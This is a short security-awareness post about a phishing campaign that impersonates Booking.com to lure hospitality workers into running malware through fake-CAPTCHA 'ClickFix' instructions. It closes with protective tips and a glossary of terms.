Phishing Campaign Impersonates Booking .com, Delivers a Suite of Credential-Stealing Malware

In this publication, we're uncovering a scam that has been making waves and could potentially affect you or someone you know. Let’s dive right in.

Summary: Cybercriminals are using a phishing campaign that impersonates Booking.com to target hospitality organizations worldwide. This scam employs a social engineering technique called ClickFix, tricking users into executing malware by following bogus “fix” instructions. The ultimate goal? Credential theft and financial fraud.


How It Works:

  1. Impersonation: Scammers send fake Booking.com emails to hospitality employees.
  2. Urgency & Deception: These emails reference negative guest reviews, account verification, or promotional opportunities.
  3. Fake CAPTCHA & ClickFix: Victims are lured to a phishing webpage, where a fake CAPTCHA instructs them to copy and paste a malicious command.
  4. Malware Execution: The command, when executed via Windows Run, installs malware such as XWorm, Lumma Stealer, VenomRAT, and others.
  5. Data Theft & Fraud: Stolen credentials and payment data are used for financial fraud.


Who’s Targeted:

  • Hospitality industry professionals.
  • Organizations in North America, Oceania, South/Southeast Asia, and Europe.
  • Employees likely to interact with Booking.com.


Real-Life Example: 

In early 2025, a European hotel employee received an email claiming their Booking.com account required urgent verification. Trusting the email, they followed the steps, unknowingly executing a command that compromised their system. Within hours, guest payment details were stolen, leading to fraudulent transactions.


Why You Should Care:

  • Financial Risk: Stolen credentials lead to unauthorized charges and financial losses.
  • Reputation Damage: Hospitality businesses risk customer trust when data is breached.
  • Widespread Impact: The scam is evolving, targeting multiple industries.


How to Protect Yourself:

  1. Verify Emails: Always check the sender’s address and hover over links before clicking.
  2. Avoid Copy-Pasting Commands: Never execute commands from untrusted sources.
  3. Enable Multi-Factor Authentication (MFA): Secure accounts against unauthorized access.
  4. Use Secure Browsers: Microsoft Edge and others with phishing protection help block malicious sites.
  5. Educate Your Team: Train employees to recognize phishing tactics.


Quick Tips & Updates:

  • Pro Tip: If an email pressures you to act immediately, take a step back—it’s likely a scam.
  • Did You Know? Attackers often use typosquatting—domains like b00king[.]com instead of booking.com.


Stay safe, stay informed.


Keyword Definitions:

  • Phishing: A cyber-attack where scammers trick individuals into revealing sensitive information, often through fake emails or websites.
  • ClickFix: A social engineering technique where attackers trick users into executing malicious commands under the guise of “fixing” an issue.
  • Malware: Malicious software designed to damage, disrupt, or steal data from devices.
  • RAT (Remote Access Trojan): A type of malware that gives hackers remote control over a victim’s computer.
  • Credential Stealer: A type of malware that captures login information, allowing attackers to access accounts.
  • Multi-Factor Authentication (MFA): A security process requiring multiple forms of verification before granting access to an account.
  • CAPTCHA: A security feature designed to distinguish between human users and automated bots, often used to protect websites.

To read more, kindly find source article here

Chaos Around Social Security Could Create an Opportunity For Scammers